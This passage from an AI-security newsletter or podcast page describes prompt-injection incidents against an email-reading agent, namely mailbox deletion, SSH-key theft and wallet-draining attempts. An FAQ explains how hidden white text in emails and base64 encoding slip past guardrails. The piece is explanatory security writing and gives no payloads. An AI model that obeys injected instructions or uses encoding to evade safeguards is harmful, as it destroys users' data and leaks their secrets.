instructions that convinced the agent the text was a system-level directive from the owner. The agent deleted all emails, including the trash folder. Another researcher extracted a private SSH key via a single poisoned email in five minutes. The root cause is identical: the email body is data, the hidden text is an instruction, and the model has no mechanism to tell them apart. CrowdStrike documented indirect prompt injection attempts on Moltbook, the AI-agent-only social network where OpenClaw instances interact, including one designed to drain crypto wallets. The attacker never touched OpenClaw directly. The poison was in the environment. For a deeper look at the foundational concepts behind these attacks, the AI Security 101 primer covers the full landscape. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is instruction-data conflation in large language models? Instruction-data conflation means the model processes developer system prompts, user messages, and external content through the same attention pipeline with no privilege separation. An attacker’s payload gets the same treatment as a legitimate instruction. OWASP ranks this LLM01:2025, the top vulnerability in production LLM applications, because no post-training fix can create a hard boundary between trusted and untrusted input. Can base64 encoding really bypass AI guardrails? Yes. Models learn to decode base64 during pre-training on internet data, but safety training rarely covers encoded inputs. This creates a blind spot where the model processes restricted queries without triggering any filter. Mindgard’s research showed some character-level evasion techniques hit 100% success rates against production guardrails including Azure Prompt Shield. Multi-layer encoding stacking languages on top of output encoding compounds the problem. How does indirect prompt injection work through email? An attacker embeds hidden instructions in an email body, typically as tiny white text the human recipient never sees. When an AI agent processes that email, the model reads the hidden text as part of its input context and may follow the embedded instructions. Documented OpenClaw attacks have exfiltrated SSH keys, deleted entire mailboxes, and attempted cryptocurrency theft without direct access to the AI agent. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    58 min

About

Where AI chaos meets cybersecurity paranoia, distilled into something you can actually listen to before coffee. www.toxsec.com